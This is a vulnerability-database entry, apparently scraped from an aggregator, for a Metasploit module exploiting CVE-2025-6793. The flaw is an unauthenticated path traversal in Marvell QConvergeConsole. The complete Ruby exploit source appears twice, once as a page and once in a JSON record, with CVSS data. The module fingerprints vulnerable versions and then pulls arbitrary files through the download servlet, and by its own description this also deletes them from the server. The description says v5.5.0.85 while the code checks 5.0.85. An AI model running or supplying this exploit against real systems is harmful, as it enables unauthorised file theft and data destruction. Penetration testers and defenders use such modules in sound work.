Marvell QConvergeConsole Path Traversal (CVE-2025-6793)_MSF:AUXILIARY-GATHER-QCONVERGECONSOLE_TRAVERSAL-

9.4 / 10

CRITICAL

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

Description

This module exploits a path traversal vulnerability CVE-2025-6793 in Marvell QConvergeConsole use auxiliary/gather/qconvergeconsoletraversal msf auxiliaryqconvergeconsoletraversal show actions ...actions... msf auxiliaryqconvergeconsoletraversal set...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-GATHER-QCONVERGECONSOLE_TRAVERSAL-

Published May 11, 2026 at 19:03

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Marvell QConvergeConsole Path Traversal (CVE-2025-6793)',
'Description' => %q{
This module exploits a path traversal vulnerability (CVE-2025-6793) in Marvell QConvergeConsole <= v5.5.0.85 to retrieve arbitrary files from the system. No authentication is required to exploit this issue.
Note that whatever file will be retrieved, will also be deleted from the remote server.
},
'Author' => [
'Michael Heinzl', # MSF Module
'rgod' # Discovery
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-6793'],
['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-450/']
],
'DisclosureDate' => '2025-06-27',
'DefaultOptions' => {
'RPORT' => 8443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The base path for QConvergeConsole', 'QConvergeConsole']),
OptString.new('TARGET_FILE', [false, 'The file path to read from the target system.', 'win.ini']),
OptString.new('TARGET_DIR', [true, 'The folder where the file is located.', 'C:\Windows'])
]
)
end

def check
# code is obfuscated, retrieve file reference through gwt.Main.nocache.js
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(
target_uri.path, 'com.qlogic.qms.hba.gwt.Main', 'com.qlogic.qms.hba.gwt.Main.nocache.js'
)
})

return Exploit::CheckCode::Unknown('No response from server') unless res&.code == 200

# e.g., BB025677C3CC9C8B12F0CB2553088424
strong_name = res.body.match(/Sb='([A-Fa-f0-9]{32})'/)&.captures&.first
strong_name ||= res.body.match(/([A-Fa-f0-9]{32})\.cache\.html/)&.captures&.first

return Exploit::CheckCode::Detected('Could not determine GWT strong name') unless strong_name

vprint_status("GWT strong name: #{strong_name}")

res2 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(
target_uri.path, 'com.qlogic.qms.hba.gwt.Main', "#{strong_name}.cache.html"
)
})

return Exploit::CheckCode::Detected('Could not retrieve cache file') unless res2&.code == 200

data = res2.body

# Grab the first occurrence of a v5.0.x version; obfuscated response contains other version identifiers too for other components
match = data.match(/'v(5\.0\.\d+)'/i) || data.match(/v(5\.0\.\d+)/i)

return Exploit::CheckCode::Detected('No version string found') unless match

version = Rex::Version.new(match[1])

vprint_status("Detected version: #{version}")

if version <= Rex::Version.new('5.0.85')
return Exploit::CheckCode::Appears("Vulnerable version detected: #{version}")
end

Exploit::CheckCode::Safe("QConvergeConsole detected (version #{version})")
end

def run
folder = URI.encode_www_form_component(datastore['TARGET_DIR'])
file = URI.encode_www_form_component(datastore['TARGET_FILE'])

uri = normalize_uri(
target_uri.path,
'com.qlogic.qms.hba.gwt.Main',
'QLogicDownloadServlet'
)

uri = "#{uri}?folder=#{folder}&file=#{file}"
vprint_status("Request: #{uri}")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})

fail_with(Failure::UnexpectedReply, 'No response from server') unless res
fail_with(Failure::UnexpectedReply, "HTTP #{res.code}") unless res.code == 200
fail_with(Failure::UnexpectedReply, 'Invalid path or file does not exist (empty body)') if res.body.nil? || res.body.empty?

print_good("File retrieved: #{File.join(datastore['TARGET_DIR'], datastore['TARGET_FILE'])}")

path = store_loot('qconvergeconsole.file', 'application/octet-stream', datastore['RHOSTS'], res.body, datastore['TARGET_FILE'], 'File retrieved through QConvergeConsole path traversal (CVE-2025-6793).')
print_status("File saved as loot: #{path}")

report_service(
host: rhost,
port: rport,
proto: 'tcp',
name: 'https',
info: 'Marvell QConvergeConsole'
)
end
end

{
    "lastseen": "2026-05-11T19:30:11",
    "description": "This module exploits a path traversal vulnerability CVE-2025-6793 in Marvell QConvergeConsole use auxiliary/gather/qconvergeconsoletraversal msf auxiliaryqconvergeconsoletraversal show actions ...actions... msf auxiliaryqconvergeconsoletraversal set...",
    "published": "2026-05-11T19:03:18",
    "modified": "2026-05-11T19:03:18",
    "type": "metasploit",
    "title": "Marvell QConvergeConsole Path Traversal (CVE-2025-6793)",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-GATHER-QCONVERGECONSOLE_TRAVERSAL-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-6793"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Auxiliary::Report\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Marvell QConvergeConsole Path Traversal (CVE-2025-6793)',\n        'Description' => %q{\n          This module exploits a path traversal vulnerability (CVE-2025-6793) in Marvell QConvergeConsole <= v5.5.0.85 to retrieve arbitrary files from the system. No authentication is required to exploit this issue.\n          Note that whatever file will be retrieved, will also be deleted from the remote server.\n        },\n        'Author' => [\n          'Michael Heinzl', # MSF Module\n          'rgod' # Discovery\n        ],\n        'License' => MSF_LICENSE,\n        'References' => [\n          ['CVE', '2025-6793'],\n          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-450/']\n        ],\n        'DisclosureDate' => '2025-06-27',\n        'DefaultOptions' => {\n          'RPORT' => 8443,\n          'SSL' => true\n        },\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [],\n          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]\n        }\n      )\n    )\n\n    register_options(\n      [\n        OptString.new('TARGETURI', [true, 'The base path for QConvergeConsole', 'QConvergeConsole']),\n        OptString.new('TARGET_FILE', [false, 'The file path to read from the target system.', 'win.ini']),\n        OptString.new('TARGET_DIR', [true, 'The folder where the file is located.', 'C:\\Windows'])\n      ]\n    )\n  end\n\n  def check\n    # code is obfuscated, retrieve file reference through gwt.Main.nocache.js\n    res = send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(\n        target_uri.path, 'com.qlogic.qms.hba.gwt.Main', 'com.qlogic.qms.hba.gwt.Main.nocache.js'\n      )\n    })\n\n    return Exploit::CheckCode::Unknown('No response from server') unless res&.code == 200\n\n    # e.g., BB025677C3CC9C8B12F0CB2553088424\n    strong_name = res.body.match(/Sb='([A-Fa-f0-9]{32})'/)&.captures&.first\n    strong_name ||= res.body.match(/([A-Fa-f0-9]{32})\\.cache\\.html/)&.captures&.first\n\n    return Exploit::CheckCode::Detected('Could not determine GWT strong name') unless strong_name\n\n    vprint_status(\"GWT strong name: #{strong_name}\")\n\n    res2 = send_request_cgi({\n      'method' => 'GET',\n      'uri' => normalize_uri(\n        target_uri.path, 'com.qlogic.qms.hba.gwt.Main', \"#{strong_name}.cache.html\"\n      )\n    })\n\n    return Exploit::CheckCode::Detected('Could not retrieve cache file') unless res2&.code == 200\n\n    data = res2.body\n\n    # Grab the first occurrence of a v5.0.x version; obfuscated response contains other version identifiers too for other components\n    match = data.match(/'v(5\\.0\\.\\d+)'/i) || data.match(/v(5\\.0\\.\\d+)/i)\n\n    return Exploit::CheckCode::Detected('No version string found') unless match\n\n    version = Rex::Version.new(match[1])\n\n    vprint_status(\"Detected version: #{version}\")\n\n    if version <= Rex::Version.new('5.0.85')\n      return Exploit::CheckCode::Appears(\"Vulnerable version detected: #{version}\")\n    end\n\n    Exploit::CheckCode::Safe(\"QConvergeConsole detected (version #{version})\")\n  end\n\n  def run\n    folder = URI.encode_www_form_component(datastore['TARGET_DIR'])\n    file = URI.encode_www_form_component(datastore['TARGET_FILE'])\n\n    uri = normalize_uri(\n      target_uri.path,\n      'com.qlogic.qms.hba.gwt.Main',\n      'QLogicDownloadServlet'\n    )\n\n    uri = \"#{uri}?folder=#{folder}&file=#{file}\"\n    vprint_status(\"Request: #{uri}\")\n    res = send_request_cgi({\n      'method' => 'GET',\n      'uri' => uri\n    })\n\n    fail_with(Failure::UnexpectedReply, 'No response from server') unless res\n    fail_with(Failure::UnexpectedReply, \"HTTP #{res.code}\") unless res.code == 200\n    fail_with(Failure::UnexpectedReply, 'Invalid path or file does not exist (empty body)') if res.body.nil? || res.body.empty?\n\n    print_good(\"File retrieved: #{File.join(datastore['TARGET_DIR'], datastore['TARGET_FILE'])}\")\n\n    path = store_loot('qconvergeconsole.file', 'application/octet-stream', datastore['RHOSTS'], res.body, datastore['TARGET_FILE'], 'File retrieved through QConvergeConsole path traversal (CVE-2025-6793).')\n    print_status(\"File saved as loot: #{path}\")\n\n    report_service(\n      host: rhost,\n      port: rport,\n      proto: 'tcp',\n      name: 'https',\n      info: 'Marvell QConvergeConsole'\n    )\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/qconvergeconsole_traversal.rb",
    "cvss": {
        "score": 9.4,
        "severity": "CRITICAL",
        "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H",
        "version": "3.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "HIGH"
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/gather/qconvergeconsole_traversal/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply